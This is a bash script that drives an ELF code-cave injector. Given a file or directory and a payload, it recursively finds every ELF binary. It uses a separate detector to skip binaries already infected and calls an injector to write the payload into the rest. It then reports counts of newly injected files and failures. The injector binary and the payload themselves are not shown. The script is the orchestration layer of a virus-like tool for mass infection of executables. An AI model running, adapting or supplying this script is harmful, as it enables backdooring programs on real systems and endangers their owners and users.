#!/bin/bash -f
path=$1
payload=$2
shopt -s globstar

NUM_OF_FILES=0
NUM_OF_ELFS=0
NUM_OF_ALREADY_INJECTED=0
SUCCESS=0
OPEN_ERROR=0
NOT_SUFFICIENT_CAVE_FOUND=0
MMAP_ERROR=0
OTHER_ERROR=0
UNKNOWN_ERROR=0

if [[ -f $path ]]; then
  h=$(head -c 4 $path)
  h=${h:1:3}
  if [[ $h = ELF ]];then
    echo $path
    is_injected=$(./build/detector $path $payload)
    if [[ $is_injected = 1 ]];then
      echo file is already is_injected
    else
      output=$(./build/injector $path $payload)
      if [[ $output = 0 ]];then
        echo injected succesfully
      elif [[ $output = 1 ]];then
        echo OPEN_ERROR
      elif [[ $output = 2 ]];then
        echo NOT_SUFFICIENT_CAVE_FOUND
      elif [[ $output = 3 ]];then
        echo MMAP_ERROR
      elif [[ $output = 4 ]];then
        echo OTHER_ERROR
      else
        echo unknown_error
      fi
    fi
    echo
  fi

  elif [[ -d $path ]];then
    for file in `ls -d $path/**`
      do
       if [[ -f $file ]]; then
         (( NUM_OF_FILES++ ))
         h=$(head -c 4 $file)
         h=${h:1:3}

         if [[ $h = ELF ]];then
          (( NUM_OF_ELFS++ ))
          echo $file
          is_injected=$(./build/detector $file $payload)
          if [[ $is_injected = 1 ]];then
            (( NUM_OF_ALREADY_INJECTED++ ))
            echo file is already injected
          else
            output=$(./build/injector $file $payload)
            if [[ $output = 0 ]];then
              echo injected succesfully
              (( SUCCESS++ ))
            elif [[ $output = 1 ]];then
              echo OPEN_ERROR
              (( OPEN_ERROR++ ))
            elif [[ $output = 2 ]];then
              echo NOT_SUFFICIENT_CAVE_FOUND
              (( NOT_SUFFICIENT_CAVE_FOUND++ ))
            elif [[ $output = 3 ]];then
              echo MMAP_ERROR
              (( MMAP_ERROR++ ))
            elif [[ $output = 4 ]];then
              echo OTHER_ERROR
              (( OTHER_ERROR++ ))
            else
              echo unknown_error
              (( UNKNOWN_ERROR++ ))
            fi
          fi
          echo
       fi
     fi
    done
  echo total num of files $NUM_OF_FILES
  echo $NUM_OF_ELFS of elf files
  echo $NUM_OF_ALREADY_INJECTED already injected elfs
  echo $SUCCESS newly injected elfs
  echo $NOT_SUFFICIENT_CAVE_FOUND NOT_SUFFICIENT_CAVE_FOUND
  echo $OPEN_ERROR OPEN_ERROR
  echo $MMAP_ERROR MMAP_ERROR
  echo $OTHER_ERROR OTHER_ERROR
  echo $UNKNOWN_ERROR UNKNOWN_ERROR
fi

